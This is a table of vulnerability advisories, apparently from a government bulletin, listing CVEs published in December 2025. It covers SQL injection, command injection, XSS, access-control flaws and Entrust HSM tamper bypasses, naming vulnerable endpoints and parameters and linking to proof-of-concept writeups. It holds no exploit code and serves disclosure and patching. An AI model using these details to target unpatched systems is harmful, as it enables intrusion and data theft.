| n/a--ApiPayController.java of platform v1.0.0 | Incorrect access control in the component ApiOrderService.java of platform v1.0.0 allows attackers to access sensitive information via a crafted request. | 2025-12-04 | not yet calculated | CVE-2025-57212 | https://gitee.com/fuyang_lipengjun/platform https://gist.github.com/xueye0629/85730f2317cfac2796fe5e23da3ae399 |
| n/a--Aquarius Desktop 3.0.069 | Aquarius Desktop 3.0.069 for macOS contains an insecure file handling vulnerability in its support data archive generation feature. The application follows symbolic links placed inside the ~/Library/Logs/Aquarius directory and treats them as regular files. When building the support ZIP, Aquarius recursively enumerates logs using a JUCE directory iterator configured to follow symlinks, and later writes file data without validating whether the target is a symbolic link. A local attacker can exploit this behavior by planting symlinks to arbitrary filesystem locations, resulting in unauthorized disclosure or modification of arbitrary files. When chained with the associated HelperTool privilege escalation issue, root-owned files may also be exposed. | 2025-12-03 | not yet calculated | CVE-2025-65843 | https://almightysec.com/insecure-file-handling-via-symlink/ |
| n/a--Aquarius Desktop 3.0.069 for macOS | Aquarius Desktop 3.0.069 for macOS stores user authentication credentials in the local file ~/Library/Application Support/Aquarius/aquarius.settings using a weak obfuscation scheme. The password is "encrypted" through predictable byte-substitution that can be trivially reversed, allowing immediate recovery of the plaintext value. Any attacker who can read this settings file can fully compromise the victim's Aquarius account by importing the stolen configuration into their own client or login through the vendor website. This results in complete account takeover, unauthorized access to cloud-synchronized data, and the ability to perform authenticated actions as the user. | 2025-12-03 | not yet calculated | CVE-2025-65841 | http://acustica.com http://aquarius.com https://almightysec.com/account-takeover-via-weak-encryption/ |
| n/a--Authentication Bypass via Hardcoded Credentials GoAway up to v0.62.18 | Authentication Bypass via Hardcoded Credentials GoAway up to v0.62.18, fixed in 0.62.19, uses a hardcoded secret for signing JWT tokens used for authentication. | 2025-12-05 | not yet calculated | CVE-2025-65730 | https://github.com/pommee/goaway/releases/tag/v0.62.16 https://github.com/pommee/goaway/blob/v0.62.18/backend/api/middleware.go#L15 https://github.com/pommee/goaway/blob/v0.62.18/backend/api/middleware.go#L110 https://github.com/pommee/goaway/blob/v0.62.18/backend/api/middleware.go#L69 https://github.com/pommee/goaway/blob/v0.62.18/backend/api/auth.go#L48 https://github.com/pommee/goaway/blob/v0.62.18/backend/api/middleware.go#L88 https://github.com/pommee/goaway/blob/v0.62.18/backend/api/middleware.go#L40 https://github.com/pommee/goaway/commit/5769f8782b7453ca1c22a201b224b5ce48532f64#diff-4ddfd6cf1311ddfd45734bb1dc53bc208df69584ba92ac4f38866bd558434678L15-L40 https://github.com/gian2dchris/CVEs/tree/CVE-2025-65730/CVE-2025-65730 |
| n/a--AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 | AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 was discovered to contain an authenticated command injection vulnerability in the Machine.cgi endpoint. This vulnerability allows attackers to execute arbitrary commands via a crafted input. | 2025-12-03 | not yet calculated | CVE-2025-57198 | http://avtech.com http://dgm1104.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2025-57198 |
| n/a--AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 | AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 was discovered to contain an authenticated command injection vulnerability in the NetFailDetectD binary. This vulnerability allows attackers to execute arbitrary commands via a crafted input. | 2025-12-03 | not yet calculated | CVE-2025-57199 | http://avtech.com http://dgm1104.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2025-57199 |
| n/a--AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 | AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 was discovered to contain an authenticated command injection vulnerability in the test_mail function. This vulnerability allows attackers to execute arbitrary commands via a crafted input. | 2025-12-03 | not yet calculated | CVE-2025-57200 | http://avtech.com http://dgm1104.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2025-57200 |
| n/a--AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 | AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 was discovered to contain an authenticated command injection vulnerability in the SMB server function. This vulnerability allows attackers to execute arbitrary commands via a crafted input. | 2025-12-03 | not yet calculated | CVE-2025-57201 | http://avtech.com http://dgm1104.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2025-57201 |
| n/a--AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 | A stored cross-site scripting (XSS) vulnerability in the PwdGrp.cgi endpoint of AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the username field. | 2025-12-03 | not yet calculated | CVE-2025-57202 | http://avtech.com http://dmg1104.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2025-57202 |
| n/a--Bluetooth Human Interface Device (HID) of JXL 9 Inch Car Android Double Din Player Android v12.0 | An issue in the Bluetooth Human Interface Device (HID) of JXL 9 Inch Car Android Double Din Player Android v12.0 allows attackers to inject arbitrary keystrokes via a spoofed Bluetooth HID device. | 2025-12-04 | not yet calculated | CVE-2025-63896 | http://jxl.com https://github.com/thorat-shubham/JXL_Infotainment_CVE/blob/main/README.md |
| n/a--Calibre-Web v0.6.25 | A Stored Cross-Site Scripting (XSS) vulnerability in Calibre-Web v0.6.25 allows attackers to inject malicious JavaScript into the 'username' field during user creation. The payload is stored unsanitized and later executed when the /ajax/listusers endpoint is accessed. | 2025-12-02 | not yet calculated | CVE-2025-65858 | https://github.com/KhanhDuy155/calibre-web-CVE-2025-65858/blob/main/CVE-2025-65858.md |
| n/a--CiviCRM before v6.7 | A Stored Cross Site Scripting vulnerability exists in CiviCRM before v6.7 in the Accounting Batches field. An authenticated user can inject malicious JavaScript into this field and it executes whenever the page is viewed. | 2025-12-02 | not yet calculated | CVE-2025-65187 | https://civicrm.com/ https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65187.pdf |
| n/a--code-projects Online Medicine Guide 1.0 | code-projects Online Medicine Guide 1.0 is vulnerable to SQL Injection in /login.php via the upass parameter. | 2025-12-02 | not yet calculated | CVE-2025-60736 | https://github.com/WinDyAlphA/CVE-2025-60736 |
| n/a--ComposioHQ v.0.7.20 | Directory Traversal vulnerability in ComposioHQ v.0.7.20 allows a remote attacker to obtain sensitive information via the _download_file_or_dir function. | 2025-12-04 | not yet calculated | CVE-2025-56427 | https://github.com/ComposioHQ/composio/blob/master/python/composio/server/api.py#L278 https://github.com/TOAST-Research/pocs/blob/main/composio/composio_1.md |
| n/a--D-Link R15 (AX1500) 1.20.01 | A vulnerability has been found in D-Link R15 (AX1500) 1.20.01 and below. By manipulating the model name parameter during a password change request in the web administrator page, it is possible to trigger a command injection in httpd. | 2025-12-02 | not yet calculated | CVE-2025-60854 | https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10473 |
| n/a--dcat-admin v2.2.3-beta and before | dcat-admin v2.2.3-beta and before is vulnerable to file inclusion in admin/src/Extend/VersionManager.php. | 2025-12-02 | not yet calculated | CVE-2025-65656 | https://github.com/jqhph/dcat-admin https://github.com/lznlol/operation-log/blob/main/CVE-2025-65656.md |
| n/a--DeepSeek V3.2 | DeepSeek V3.2 has a Cross Site Scripting (XSS) vulnerability, which allows JavaScript execution through model-generated SVG content. | 2025-12-02 | not yet calculated | CVE-2025-63872 | https://medium.com/@vinitkundu14/cve-2025-63872-svg-based-xss-in-deepseek-chat-v3-2-db4ebc1f1f28 |
| n/a--E-POINT CMS eagle.gsam-1169.1 | The E-POINT CMS eagle.gsam-1169.1 file upload feature improperly handles nested archive files. An attacker can upload a nested ZIP (a ZIP containing another ZIP) where the inner archive contains an executable file (e.g. webshell.php). When the application extracts the uploaded archives, the executable may be extracted into a web-accessible directory. This can lead to remote code execution (RCE), data disclosure, account compromise, or further system compromise depending on the web server/process privileges. The issue arises from insufficient validation of archive contents and inadequate restrictions on extraction targets. | 2025-12-04 | not yet calculated | CVE-2025-65806 | https://www.e-point.pl/produkty/e-point-cms https://github.com/Bidon47/CVE-2025-65806/blob/main/CVE-2025-65806.md |
| n/a--Edoc-doctor-appointment-system v1.0.1 | Edoc-doctor-appointment-system v1.0.1 was discovered to contain a SQL injection vulnerability via the 'docid' parameter at /admin/appointment.php. | 2025-12-02 | not yet calculated | CVE-2025-65358 | https://github.com/HashenUdara/edoc-doctor-appointment-system https://github.com/omkaryepre/vulnerability-research/tree/main/CVE-2025-65358 |
| n/a--EduplusCampus 3.0.1 | An Insecure Direct Object Reference (IDOR) vulnerability in the EduplusCampus 3.0.1 Student Payment API allows authenticated users to access other students' personal and financial records by modifying the 'rec_no' parameter in the /student/get-receipt endpoint. | 2025-12-04 | not yet calculated | CVE-2025-61148 | https://drive.google.com/file/d/1BRZRurbl7TY6KU4uaelAUn7L9Cn6XfjC/view?usp=sharing https://medium.com/@Charon19d/how-i-hacked-all-universities-in-my-city-d6b8e320455c https://github.com/sharma19d/CVE-2025-61148 |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | The Chassis Management Board in Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allows a physically proximate attacker to obtain debug access and escalate privileges by bypassing the tamper label and opening the chassis without leaving evidence, and accessing the JTAG connector. This is called F02. | 2025-12-02 | not yet calculated | CVE-2025-59693 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | The Chassis Management Board in Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allows a physically proximate attacker to persistently modify firmware and influence the (insecurely configured) appliance boot process. To exploit this, the attacker must modify the firmware via JTAG or perform an upgrade to the chassis management board firmware. This is called F03. | 2025-12-02 | not yet calculated | CVE-2025-59694 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a user with OS root access to alter firmware on the Chassis Management Board (without Authentication). This is called F04. | 2025-12-02 | not yet calculated | CVE-2025-59695 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a physically proximate attacker to modify or erase tamper events via the Chassis management board. | 2025-12-02 | not yet calculated | CVE-2025-59696 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a physically proximate attacker to escalate privileges by editing the Legacy GRUB bootloader configuration to start a root shell upon boot of the host OS. This is called F06. | 2025-12-02 | not yet calculated | CVE-2025-59697 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, might allow a physically proximate attacker to gain access to the EOL legacy bootloader. | 2025-12-02 | not yet calculated | CVE-2025-59698 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a physically proximate attacker to escalate privileges by booting from a USB device with a valid root filesystem. This occurs because of insecure default settings in the Legacy GRUB Bootloader. | 2025-12-02 | not yet calculated | CVE-2025-59699 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a physically proximate attacker with root access to modify the Recovery Partition (because of a lack of integrity protection). | 2025-12-02 | not yet calculated | CVE-2025-59700 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a physically proximate attacker (with elevated privileges) to read and modify the Appliance SSD contents (because they are unencrypted). | 2025-12-02 | not yet calculated | CVE-2025-59701 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a physically proximate attacker with elevated privileges to falsify tamper events by accessing internal components. | 2025-12-02 | not yet calculated | CVE-2025-59702 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a Physically Proximate Attacker to access the internal components of the appliance, without leaving tamper evidence. To exploit this, the attacker needs to remove the tamper label and all fixing screws from the device without damaging it. This is called an F14 attack. | 2025-12-02 | not yet calculated | CVE-2025-59703 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow an attacker to gain access to the BIOS menu because it has no password. | 2025-12-02 | not yet calculated | CVE-2025-59704 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a Physically Proximate Attacker to Escalate Privileges by enabling the USB interface through chassis probe insertion during system boot, aka "Unauthorized Reactivation of the USB interface" or F01. | 2025-12-02 | not yet calculated | CVE-2025-59705 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--ERPNext v15.83.2 and Frappe Framework v15.86.0 | In ERPNext v15.83.2 and Frappe Framework v15.86.0, improper validation of uploaded SVG avatar images allows attackers to embed malicious JavaScript. The payload executes when an administrator clicks the image link to view the avatar, resulting in stored cross-site scripting (XSS). Successful exploitation may lead to account takeover, privilege escalation, or full compromise of the affected ERPNext instance. | 2025-12-03 | not yet calculated | CVE-2025-65267 | https://github.com/frappe/frappe https://github.com/frappe/erpnext https://github.com/PhDg1410/CVE/tree/main/CVE-2025-65267 |
| n/a--EverShop 2.0.1 | EverShop 2.0.1 allows a remote unauthenticated attacker to upload arbitrary files and create directories via the /api/images endpoint. The endpoint is accessible without authentication by default, and server-side validation of uploaded files is insufficient. This can be abused to upload arbitrary content (including non-image files) which could impersonate user/admin login panels (exfiltrating credentials) and to perform a denial-of-service attack by exhausting disk space. | 2025-12-02 | not yet calculated | CVE-2025-65844 | https://github.com/evershopcommerce/evershop/issues/819 |
| n/a--Eximbills Enterprise 4.1.5 (Built on 2020-10-30) | Eximbills Enterprise 4.1.5 (Built on 2020-10-30) is vulnerable to authenticated stored cross-site scripting (CWE-79) via the /EximBillWeb/servlets/WSTrxManager endpoint. Unsanitized user input in the TMPL_INFO parameter is stored server-side and rendered to other users, enabling arbitrary JavaScript execution in their browsers. | 2025-12-01 | not yet calculated | CVE-2025-64030 | https://chinasystems.com/whatwedo/ee https://0xy37.medium.com/stored-xss-in-chinasystems-eximbills-enterprise-v4-1-5-f8f5a79c4f0b |
| n/a--eyoucms v1.7.1 | XML external entity (XXE) injection in eyoucms v1.7.1 allows remote attackers to cause a denial of service via a crafted body of a POST request. | 2025-12-03 | not yet calculated | CVE-2025-65868 | https://github.com/weng-xianhu/eyoucms/issues/66 |
| n/a--Fanvil x210 V2 2.12.20 | An issue was discovered in Fanvil x210 V2 2.12.20 allowing unauthenticated attackers on the local network to execute arbitrary system commands. | 2025-12-05 | not yet calculated | CVE-2025-64052 | http://fanvil.com https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64052.md |
| n/a--Fanvil x210 V2 2.12.20 | A buffer overflow vulnerability on Fanvil x210 2.12.20 devices allows attackers to cause a denial of service or potentially execute arbitrary commands via a crafted POST request to the /cgi-bin/webconfig?page=upload&action=submit endpoint. | 2025-12-05 | not yet calculated | CVE-2025-64053 | http://fanvil.com https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64053.md |
| n/a--Fanvil x210 V2 2.12.20 | A reflected Cross Site Scripting (XSS) vulnerability on Fanvil x210 2.12.20 devices allows attackers to cause a denial of service or potentially execute arbitrary commands via a crafted POST request to the /cgi-bin/webconfig?page=upload&action=submit endpoint. | 2025-12-05 | not yet calculated | CVE-2025-64054 | http://fanvil.com https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64054.md |
| n/a--Fanvil x210 V2 2.12.20 | An issue was discovered in Fanvil x210 V2 2.12.20 allowing unauthenticated attackers on the local network to access administrative functions of the device (e.g. file upload, firmware update, reboot...) via a crafted authentication bypass. | 2025-12-03 | not yet calculated | CVE-2025-64055 | http://fanvil.com https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64055.md |
| n/a--Fanvil x210 V2 2.12.20 | File upload vulnerability in Fanvil x210 V2 2.12.20 allows unauthenticated attackers on the local network to store arbitrary files on the filesystem. | 2025-12-05 | not yet calculated | CVE-2025-64056 | http://fanvil.com https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64056.md |
| n/a--Fanvil x210 V2 2.12.20 | Directory traversal vulnerability in Fanvil x210 V2 2.12.20 allows unauthenticated attackers on the local network to store files in arbitrary locations and potentially modify the system configuration or other unspecified impacts. | 2025-12-05 | not yet calculated | CVE-2025-64057 | http://fanvil.com https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64057.md |
| n/a--FeehiCMS 2.1.1 | Cross Site Scripting (XSS) vulnerability in FeehiCMS 2.1.1 via the id parameter of the User Update function (?r=user%2Fupdate). | 2025-12-01 | not yet calculated | CVE-2025-63520 | https://github.com/liufee/cms/issues/74 https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63520.md |
| n/a--FeehiCMS 2.1.1 | Reverse Tabnabbing vulnerability in FeehiCMS 2.1.1 in the Comments Management function. | 2025-12-01 | not yet calculated | CVE-2025-63522 | https://github.com/liufee/cms/issues/76 https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63522.md |
| n/a--FeehiCMS 2.1.1 | FeehiCMS version 2.1.1 fails to enforce server-side immutability for parameters that are presented to clients as "read-only." An authenticated attacker can intercept and modify the parameter in transit and the backend accepts the changes. This can lead to unintended username changes. | 2025-12-01 | not yet calculated | CVE-2025-63523 | https://github.com/liufee/cms/issues/77 https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63523.md |
| n/a--FeehiCMS version 2.1.1 | FeehiCMS version 2.1.1 has a Remote Code Execution via Unrestricted File Upload in Ad Management. FeehiCMS version 2.1.1 allows authenticated remote attackers to upload files that the server later executes (or stores in an executable location) without sufficient validation, sanitization, or execution restrictions. An authenticated remote attacker can upload a crafted PHP file and cause the application or web server to execute it, resulting in remote code execution (RCE). | 2025-12-02 | not yet calculated | CVE-2025-65657 | https://github.com/liufee/cms/issues/78 https://github.com/kiwi865/CVEs/blob/main/CVE-2025-65657.md |
| n/a--Genexis Platinum P4410 router (Firmware P4410-V2-1.41) | A vulnerability has been identified in Genexis Platinum P4410 router (Firmware P4410-V2-1.41) that allows a local network attacker to achieve Remote Code Execution (RCE) with root privileges. The issue occurs due to improper session invalidation after administrator logout. When an administrator logs out, the session token remains valid. An attacker on the local network can reuse this stale token to send crafted requests via the router's diagnostic endpoint, resulting in command execution as root. | 2025-12-04 | not yet calculated | CVE-2025-65883 | https://0xw41th.medium.com/my-first-cve-cve-2025-65883-remote-code-execution-in-a-genexis-router-0c35749a99bd |
| n/a--github.com/sirupsen/logrus when using Entry.Writer() | A denial-of-service vulnerability exists in github.com/sirupsen/logrus when using Entry.Writer() to log a single-line payload larger than 64KB without newline characters. Due to limitations in the internal bufio.Scanner, the read fails with "token too long" and the writer pipe is closed, leaving Writer() unusable and causing application unavailability (DoS). This affects versions < 1.8.3, 1.9.0, and 1.9.2. The issue is fixed in 1.8.3, 1.9.1, and 1.9.3+, where the input is chunked and the writer continues to function even if an error is logged. | 2025-12-04 | not yet calculated | CVE-2025-65637 | https://github.com/mjuanxd/logrus-dos-poc https://github.com/sirupsen/logrus/issues/1370 https://github.com/sirupsen/logrus/pull/1376 https://github.com/sirupsen/logrus/releases/tag/v1.8.3 https://github.com/sirupsen/logrus/releases/tag/v1.9.1 https://github.com/sirupsen/logrus/releases/tag/v1.9.3 https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMSIRUPSENLOGRUS-5564391 https://github.com/mjuanxd/logrus-dos-poc/blob/main/README.md |
| n/a--Grav CMS 1.7.49 | Grav CMS 1.7.49 is vulnerable to Cross Site Scripting (XSS). The page editor allows authenticated users to edit page content via a Markdown editor. The editor fails to properly sanitize <script> tags, allowing stored XSS payloads to execute when pages are viewed in the admin interface. | 2025-12-02 | not yet calculated | CVE-2025-65186 | https://github.com/getgrav/grav https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65186.pdf |
| n/a--HCL Technologies Limited HCLTech DRAGON before v.7.6.0 | Cross Site Scripting vulnerability in HCL Technologies Limited HCLTech DRAGON before v.7.6.0 allows a remote attacker to execute arbitrary code via missing directives. | 2025-12-03 | not yet calculated | CVE-2025-63401 | http://hcltech.com http://hcl.com https://excalibur-hcl.my.salesforce.com/sfc/p/#U0000000YO14/a/Pf000003dyQn/x0oUOgfHG6F0wUhpmSMcmXMuwO2GYuSf_duzWPRebao |
| n/a--HCL Technologies Limited HCLTech DRAGON before v.7.6.0 | An issue in HCL Technologies Limited HCLTech DRAGON before v.7.6.0 allows a remote attacker to execute arbitrary code via APIs that do not enforce limits on the number or size of requests. | 2025-12-03 | not yet calculated | CVE-2025-63402 | http://hcltech.com http://hcl.com https://excalibur-hcl.my.salesforce.com/sfc/p/#U0000000YO14/a/Pf000003dyVd/ckzaFpdm68dwd1nWqgtLfXHp3Pim_YwLUI4WcRB__Ng |
| n/a--InstallationHelper service included with Plugin Alliance Installation Manager v1.4.0 for macOS | A local privilege escalation vulnerability exists in the InstallationHelper service included with Plugin Alliance Installation Manager v1.4.0 for macOS. The service accepts unauthenticated XPC connections and executes input via system(), which may allow a local user to execute arbitrary commands with root privileges. | 2025-12-03 | not yet calculated | CVE-2025-55076 | https://almightysec.com/plugin-alliance-helpertool-xpc-service-local-privilege-escalation/ |
| n/a--Kalmia CMS version 0.2.0 | Kalmia CMS version 0.2.0 contains a user enumeration vulnerability in its authentication mechanism. The application returns different error messages for invalid users (user_not_found) versus valid users with incorrect passwords (invalid_password). This observable response discrepancy allows unauthenticated attackers to enumerate valid usernames on the system. | 2025-12-04 | not yet calculated | CVE-2025-65899 | https://github.com/DifuseHQ/Kalmia https://github.com/Noxurge/CVE-2025-65899/blob/main/README.md |
| n/a--Kalmia CMS version 0.2.0 | Kalmia CMS version 0.2.0 contains an Incorrect Access Control vulnerability in the /kal-api/auth/users API endpoint. Due to insufficient permission validation and excessive data exposure in the backend, an authenticated user with basic read permissions can retrieve sensitive information for all platform users. | 2025-12-04 | not yet calculated | CVE-2025-65900 | https://github.com/DifuseHQ/Kalmia https://github.com/Noxurge/CVE-2025-65900/blob/main/README.md |
| n/a--KerOS prior to 5.12 | The service wmp-agent of KerOS prior to 5.12 does not properly validate so-called 'magic URLs', allowing an unauthenticated remote attacker to execute arbitrary OS commands as root when the service is reachable over the network. Typically, the service is protected via a local firewall. | 2025-12-01 | not yet calculated | CVE-2024-39148 | https://keros.docs.kerlink.com/security/security_advisories_kerOS5 https://www.bdosecurity.de/en-gb/advisories/cve-2024-39148 |
| n/a--LightFTP v2.0 | A buffer overflow in the g_cfg.MaxUsers component of LightFTP v2.0 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2025-12-01 | not yet calculated | CVE-2025-65403 | https://shimo.im/docs/9030JMJpv4IM4Nkw https://github.com/hfiref0x/LightFTP |
| n/a--Live555 Streaming Media v2018.09.02 | A buffer overflow in the getSideInfo2() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via a crafted MP3 stream. | 2025-12-01 | not yet calculated | CVE-2025-65404 | https://shimo.im/docs/16q8xMxpPlH8Z2q7 https://github.com/rgaufman/live555 |
| n/a--Live555 Streaming Media v2018.09.02 | A use-after-free in the ADTSAudioFileSource::samplingFrequency() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted ADTS/AAC file. | 2025-12-01 | not yet calculated | CVE-2025-65405 | https://github.com/rgaufman/live555 https://shimo.im/docs/25q5XMXpOwSr8w3D |
| n/a--Live555 Streaming Media v2018.09.02 | A heap overflow in the MatroskaFile::createRTPSinkForTrackNumber() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MKV file. | 2025-12-01 | not yet calculated | CVE-2025-65406 | https://github.com/rgaufman/live555 https://shimo.im/docs/1lq7rMrp8lI1vW3e |
| n/a--Live555 Streaming Media v2018.09.02 | A use-after-free in the MPEG1or2Demux::newElementaryStream() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MPEG Program stream. | 2025-12-01 | not yet calculated | CVE-2025-65407 | https://github.com/rgaufman/live555 https://shimo.im/docs/VMAPLVLpzZcZvoAg |
| n/a--Live555 Streaming Media v2018.09.02 | A NULL pointer dereference in the ADTSAudioFileServerMediaSubsession::createNewRTPSink() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted ADTS file. | 2025-12-01 | not yet calculated | CVE-2025-65408 | https://github.com/rgaufman/live555 https://shimo.im/docs/VMAPLVLp57SJ92Ag |
| n/a--long2ice asyncmy through 0.2.10 | SQL injection vulnerability in long2ice asyncmy through 0.2.10 allows attackers to execute arbitrary SQL commands via crafted dict keys. | 2025-12-02 | not yet calculated | CVE-2025-65896 | https://github.com/long2ice/asyncmy https://github.com/long2ice/asyncmy/issues/134 |
| n/a--Lvzhou CMS | Lvzhou CMS before commit c4ea0eb9cab5f6739b2c87e77d9ef304017ed615 (2025-09-22) is vulnerable to SQL injection via the 'title' parameter in com.wanli.lvzhoucms.service.ContentService#findPage. The parameter is concatenated directly into a dynamic SQL query without sanitization or prepared statements, enabling attackers to read sensitive data from the database. | 2025-12-02 | not yet calculated | CVE-2025-65877 | https://github.com/W000i/vuln/issues/1 |
| n/a--mJobtime v15.7.2 | mJobtime 15.7.2 handles authorization on the client side, which allows an attacker to modify the client-side code and gain access to administrative features. Additionally, they can craft requests based on the client-side code to call these administrative functions directly. | 2025-12-01 | not yet calculated | CVE-2025-51682 | http://mjobtime.com https://labs.infoguard.ch/advisories/cve-2025-51682_cve-2025-51683_time_management_softare_sqli-rce/ |
| n/a--mJobtime v15.7.2 | A blind SQL Injection (SQLi) vulnerability in mJobtime v15.7.2 allows unauthenticated attackers to execute arbitrary SQL statements via a crafted POST request to the /Default.aspx/update_profile_Server endpoint. | 2025-12-01 | not yet calculated | CVE-2025-51683 | http://mjobtime.com https://labs.infoguard.ch/advisories/cve-2025-51682_cve-2025-51683_time_management_softare_sqli-rce/ |
| n/a--open-webui v0.6.33 | open-webui v0.6.33 is vulnerable to Incorrect Access Control. The API /api/tasks/stop/ directly accesses and cancels tasks without verifying user ownership, enabling attackers (a normal user) to stop arbitrary LLM response tasks. | 2025-12-04 | not yet calculated | CVE-2025-63681 | https://github.com/open-webui/open-webui/blob/46ae3f4f5d7d4d706041bdae4ad2d802e568712b/backend/open_webui/main.py#L1652 https://github.com/TOAST-Research/pocs/blob/main/openwebui/arbitirary_task_stop/report.md |
| n/a--orderService.queryObject of platform v1.0.0 | Incorrect access control in the component orderService.queryObject of platform v1.0.0 allows attackers to access sensitive information via a crafted request. | 2025-12-04 | not yet calculated | CVE-2025-57213 | https://gitee.com/fuyang_lipengjun/platform https://gist.github.com/xueye0629/620e4e0cc0f23c903736971e6375f00e |
| n/a--Pepper language | A heap buffer overflow exists in compiler.c and compiler.h in Pepper language 0.1.1 at commit 961a5d9988c5986d563310275adad3fd181b2bb7. Execution of a malicious Pepper source file (.pr) could lead to arbitrary code execution or Denial of Service. | 2025-12-03 | not yet calculated | CVE-2025-50360 | https://github.com/dannyvankooten/pepper-lang https://github.com/Ch1keen/CVE-2025-50360 |
